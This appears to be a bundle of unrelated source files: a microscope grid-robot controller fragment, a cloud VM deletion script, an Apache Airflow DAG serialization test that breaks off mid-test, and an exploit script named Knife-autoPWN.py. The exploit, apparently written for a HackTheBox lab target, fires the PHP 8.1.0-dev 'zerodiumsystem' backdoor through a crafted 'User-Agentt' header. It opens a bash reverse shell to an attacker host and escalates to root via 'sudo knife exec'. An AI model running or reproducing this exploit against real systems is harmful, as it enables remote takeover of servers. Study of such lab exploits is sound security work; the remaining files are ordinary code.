self.publish(griddata, database=True)
return griddata
def selectGrid(self, gridnumber):
self.logger.info('Current grid: %d' % gridnumber)
self.communication.gridNumber = gridnumber
def robotReadyForInsertion(self):
self.logger.info('Verifying robot is ready for insertion')
while not self.communication.Signal0:
if self.communication.Signal8:
self.logger.warning('Robot failed to extract grid from tray')
self.communication.Signal8 = 0
raise GridLoadFromTrayError
time.sleep(0.5)
self.communication.Signal0 = 0
self.logger.info('Robot is ready for insertion')
def estimateTimeLeft(self):
if 'insert' not in self.timings:
self.timings['insert'] = []
self.timings['insert'].append(time.time())
timestring = ''
ntimings = len(self.timings['insert']) - 1
if ntimings > 0:
first = self.timings['insert'][0]
last = self.timings['insert'][-1]
ngridsleft = self.panel.getGridQueueSize()
secondsleft = (last - first)/ntimings*ngridsleft
timestring = seconds2str(secondsleft)
if timestring:
self.logger.info(timestring + ' remaining')
def insert(self):
self.lockScope()
self.logger.info('insert simulate=%s setting=%s' % (self.simulate, self.settings['simulate']))
if self.simulate or self.settings['simulate']:
self.estimateTimeLeft()
self.logger.info('Simulated Insertion of holder successfully completed')
try:
griddata = self.gridInserted(self.gridnumber)
except Exception, e:
self.logger.error('Failed to get scope ready for imaging: %s' % e)
self.unlockScope()
return
self.unlockScope()
return griddata
self.estimateTimeLeft()
self.logger.info('Inserting holder into microscope')
self.turboPumpOn()
self.robotReadyForInsertion()
try:
self.scopeReadyForInsertion1()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for insertion 1: %s' % e)
raise
self.signalRobotToInsert1()
self.waitForRobotToInsert1()
try:
self.scopeReadyForInsertion2()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for insertion 2: %s' % e)
raise
self.signalRobotToInsert2()
self.waitForRobotToInsert2()
self.logger.info('Insertion of holder successfully completed')
try:
griddata = self.gridInserted(self.gridnumber)
except Exception, e:
self.logger.error('Failed to get scope ready for imaging: %s' % e)
self.unlockScope()
return
self.unlockScope()
return griddata
def extract(self):
if self.simulate or self.settings['simulate']:
self.logger.info('Extraction of holder successfully completed')
return
self.logger.info('Extracting holder from microscope')
self.lockScope()
self.turboPumpOn()
self.robotReadyForExtraction()
try:
self.scopeReadyForExtraction()
except Exception, e:
self.unlockScope()
self.logger.error('Failed to get scope ready for extraction: %s' % e)
raise
self.signalRobotToExtract()
self.waitForRobotToExtract()
self.unlockScope()
self.logger.info('Extraction of holder successfully completed')
def handleGridDataCollectionDone(self, ievent):
# ...
if self.settings['pause'] and ievent:
# pause for user check
self.logger.info('setting status')
self.setStatus('user input')
self.logger.info('waiting for user to continue...')
self.usercontinue.clear()
self.usercontinue.wait()
self.usercontinue.clear()
self.setStatus('processing')
self.logger.info('continuing')
self.logger.info('extracting')
self.panel.extractingGrid()
self.extractcondition.acquire()
self.extractinfo = (None, None)
self.extractcondition.notify()
self.extractcondition.release()
evt = event.MakeTargetListEvent()
evt['grid'] = None
self.outputEvent(evt)
def getTrayLabels(self):
self.traysFromDB()
return self.gridtrayids.keys()
def setTray(self, traylabel):
try:
self.gridtrayid = self.gridtrayids[traylabel]
except KeyError:
raise ValueError('unknown tray label')
def getGridLabels(self, gridlist):
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid labels: %s' % e)
return None
gridlabels = []
for gridid in gridlist:
gridlabels.append(str(projectdata.getGridLabel(gridid)))
return gridlabels
def getGridLocations(self, traylabel):
try:
gridboxid = self.gridtrayids[traylabel]
except KeyError:
raise ValueError('unknown tray label')
try:
projectdata = project.ProjectData()
except project.NotConnectedError, e:
self.logger.error('Failed to get grid locations: %s' % e)
return None
gridlocations = projectdata.getGridLocations()
gridboxidindex = gridlocations.Index(['gridboxId'])
gridlocations = gridboxidindex[gridboxid].fetchall()
gridlabels = [i['gridId'] for i in gridlocations]
return [int(i['location']) for i in gridlocations],gridlabels
def gridInserted(self, gridnumber):
evt = event.MakeTargetListEvent()
evt['grid'] = self.makeGridData(gridnumber)
evt['grid location'] = gridnumber
evt['tray label'] = self.gridtraylabels[self.gridtrayid]
if self.simulate or self.settings['simulate']:
if evt['grid'] is None:
self.logger.error('Data collection event not sent')
else:
self.outputEvent(evt)
self.logger.info('Data collection event outputted')
return evt['grid']
self.logger.info('Grid inserted.')
self.scopeReadyForImaging()
self.logger.info('Outputting data collection event')
if evt['grid'] is None:
self.logger.error('Data collection event not sent')
else:
self.outputEvent(evt)
self.logger.info('Data collection event outputted')
return evt['grid']
def waitScope(self, parameter, value, interval=None, timeout=0.0):
if self.instrument.tem.hasAttribute(parameter):
o = self.instrument.tem
elif self.instrument.ccdcamera.hasAttribute(parameter):
o = self.instrument.ccdcamera
else:
raise ValueError('invalid parameter')
parametervalue = getattr(o, parameter)
elapsed = 0.0
if interval is not None and interval > 0:
while parametervalue != value:
time.sleep(interval)
if timeout > 0.0:
elapsed += interval
if elapsed > timeout:
raise ValueError('parameter is not set to value')
parametervalue = getattr(o, parameter)
else:
if parametervalue != value:
raise ValueError('parameter is not set to value')
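# Example (from the calls above): self.waitScope('ColumnValvePosition', 'open', 0.25)
# polls the TEM every 0.25 s until the value matches; with no polling interval a
# mismatch raises ValueError immediately, and with a positive timeout it raises
# once the timeout expires.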
|
delete_vms.py
|
import logging
import threading
from cloud.clouds import Region, Cloud
from test_steps.create_vms import env_for_singlecloud_subprocess
from util.subprocesses import run_subprocess
from util.utils import thread_timeout, Timer
def delete_vms(run_id, regions: list[Region]):
with Timer("delete_vms"):
del_aws_thread = threading.Thread(
name="Thread-delete-AWS", target=__delete_aws_vms, args=(run_id, regions)
)
del_gcp_thread = threading.Thread(
name="Thread-delete-GCP", target=__delete_gcp_vms, args=(run_id, regions)
)
del_aws_thread.start()
del_gcp_thread.start()
del_aws_thread.join(timeout=thread_timeout)
if del_aws_thread.is_alive():
logging.info("%s timed out", del_aws_thread.name)
del_gcp_thread.join(timeout=6 * 60)
if del_gcp_thread.is_alive():
logging.info("%s timed out", del_gcp_thread.name)
def __delete_aws_vms(run_id, regions):
with Timer("__delete_aws_vms"):
def delete_aws_vm(aws_cloud_region: Region):
assert aws_cloud_region.cloud == Cloud.AWS, aws_cloud_region
logging.info(
"Will delete EC2 VMs from run-id %s in %s", run_id, aws_cloud_region
)
env = env_for_singlecloud_subprocess(run_id, aws_cloud_region)
script = aws_cloud_region.deletion_script()
_ = run_subprocess(script, env)
aws_regions = [r for r in regions if r.cloud == Cloud.AWS]
del_aws_threads = []
for cloud_region in aws_regions:
del_one_aws_region_thread = threading.Thread(
name=f"Thread-delete-{cloud_region}",
target=delete_aws_vm,
args=(cloud_region,),
)
del_aws_threads.append(del_one_aws_region_thread)
del_one_aws_region_thread.start()
for del_one_aws_region_thread in del_aws_threads:
del_one_aws_region_thread.join(timeout=thread_timeout)
if del_one_aws_region_thread.is_alive():
logging.info("%s timed out", del_one_aws_region_thread.name)
def __delete_gcp_vms(run_id, regions):
with Timer("__delete_gcp_vms"):
gcp_regions = [r for r in regions if r.cloud == Cloud.GCP]
if gcp_regions:
# One arbitrary region, for getting list of VMs; deletion commands are run in sequence inside the command
cloud_region = gcp_regions[0]
logging.info("Will delete GCE VMs from run-id %s", run_id)
env = env_for_singlecloud_subprocess(run_id, cloud_region)
_ = run_subprocess(cloud_region.deletion_script(), env)
else:
# No gcp, nothing to delete
pass
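# Usage sketch (illustrative; Region objects come from cloud.clouds):
#   delete_vms("run-1234", regions)
# AWS regions are cleaned up in parallel, one deletion-script subprocess per
# region, while GCP needs a single script run because one region's script can
# enumerate the run's VMs everywhere.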
|
Knife-autoPWN.py
|
#!/usr/bin/python3
#============= imports ===============
from pwn import * # pip3 install pwntools
# explicit imports for clarity (pwn's star import may already provide some of these)
import requests
import signal
import sys
import threading
import time
#=====================================
def banner():
print(" _ ___ _ ___ _____ _____ _ ______ ___ _ ")
print("| | / \ | |_ _| ___| ____| __ _ _ _| |_ ___ | _ \ \ / / \ | |")
print("| ' /| \| || || |_ | _| _____ / _` | | | | __/ _ \| |_) \ \ /\ / /| \| |")
print("| . \| |\ || || _| | |__|_____| (_| | |_| | || (_) | __/ \ V V / | |\ |")
print("|_|\_\_| \_|___|_| |_____| \__,_|\__,_|\__\___/|_| \_/\_/ |_| \_|")
print(" ")
print(" by z3r0byte ")
# Ctrl+C handler
def def_handler(sig, frame):
print("\n[!] Saliendo...)\n")
sys.exit(1)
signal.signal(signal.SIGINT, def_handler)
# variables
main_url="http://10.10.10.242/"
# exploitation
def mainFunc(host, puerto):
p1 = log.progress("Accediendo al sistema mediante un backdoor de PHP 8.1.0-dev")
Headers = {
'User-Agentt': 'zerodiumsystem("bash -c \' bash -i >& /dev/tcp/%s/%s 0>&1\'");' % (host.rstrip("\n"), puerto)
}
time.sleep(1)
r = requests.get(main_url, headers=Headers)
p1.success("Backdoor explotado correctamente")
if __name__ == '__main__':
banner()
try:
lport="4444"
lhost=input("\nIntroduce tu LHOST para la reverse shell: ")
threading.Thread(target=mainFunc, args=(lhost, lport)).start()
except Exception as e:
log.error(str(e))
p2 = log.progress("Obteniendo reverse shell")
shell = listen(lport, timeout=10).wait_for_connection()
if shell.sock is None:
p2.failure("No ha sido posible comprometer el sistema")
sys.exit(1)
else:
p2.success("Reverse shell obtenida")
shell.sendline(b'sudo knife exec -E \'exec "/bin/sh"\'')
shell.interactive()
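# Context (not part of the script itself): the 'User-Agentt' header above triggers
# the backdoor that shipped in some PHP 8.1.0-dev builds (its zerodiumsystem() hook
# executes the injected command), and the final 'sudo knife exec' call escalates
# privileges through a sudo rule that allows running the Chef 'knife' binary.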
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from airflow.timetables.simple import NullTimetable, OnceTimetable
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
from tests.test_utils.timetables import cron_timetable, delta_timetable
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
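# Note: this pod is the "pod_override" used both in make_simple_dag()'s
# executor_config and in the serialized ground truth below, where it appears as
# PodGenerator.serialize_pod(executor_config_pod).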
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
"max_retry_delay": {"__type": "timedelta", "__var": 600.0},
"sla": {"__type": "timedelta", "__var": 100.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"doc_md": "### DAG Tutorial Documentation",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
"doc_md": "### Task Tutorial Documentation",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"max_retry_delay": 600.0,
"sla": 100.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
"edge_info": {},
"dag_dependencies": [],
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"max_retry_delay": timedelta(minutes=10),
"depends_on_past": False,
"sla": timedelta(seconds=100),
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
doc_md="### DAG Tutorial Documentation",
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
doc_md="### Task Tutorial Documentation",
)
return {'simple_dag': dag}
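# The DAG built above is the counterpart of serialized_simple_dag_ground_truth;
# test_serialization() below compares its serialized form against that dict.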
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: f'Hello {name}'},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
assert isinstance(dag, DAG)
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
assert "start_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "start_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
assert "end_date" not in serialized_dag["dag"]["tasks"][0]
else:
assert "end_date" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert simple_task.end_date == expected_task_end_date
@parameterized.expand(
[
(None, None, NullTimetable()),
("@weekly", "@weekly", cron_timetable("0 0 * * 0")),
("@once", "@once", OnceTimetable()),
(
{"__type": "timedelta", "__var": 86400.0},
timedelta(days=1),
delta_timetable(timedelta(days=1)),
),
]
)
def test_deserialization_schedule_interval(
self,
serialized_schedule_interval,
expected_schedule_interval,
expected_timetable,
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
assert dag.schedule_interval == expected_schedule_interval
assert dag.timetable == expected_timetable
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
assert serialized == expected
round_tripped = SerializedDAG._deserialize(serialized)
assert val == round_tripped
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]
else:
assert "params" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_dag.params
assert expected_val == deserialized_simple_task.params
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
assert "params" in serialized_dag["dag"]["tasks"][0]
else:
assert "params" not in serialized_dag["dag"]["tasks"][0]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
assert expected_val == deserialized_simple_task.params
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == "true"
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomOpLink': {}}
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert that OperatorLinks which are neither registered via plugins nor built in
still allow the DAG to be deserialized (no exception is raised); an error is merely logged
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
assert "bash_command" in serialized_dag["dag"]["tasks"][0]
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
assert getattr(simple_task, "bash_command") == ["echo", "true"]
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
# Test all the extra_links are set
assert set(simple_task.extra_links) == {
'BigQuery Console #1',
'BigQuery Console #2',
'airflow',
'github',
'google',
}
ti = TaskInstance(task=simple_task, execution_date=test_date)
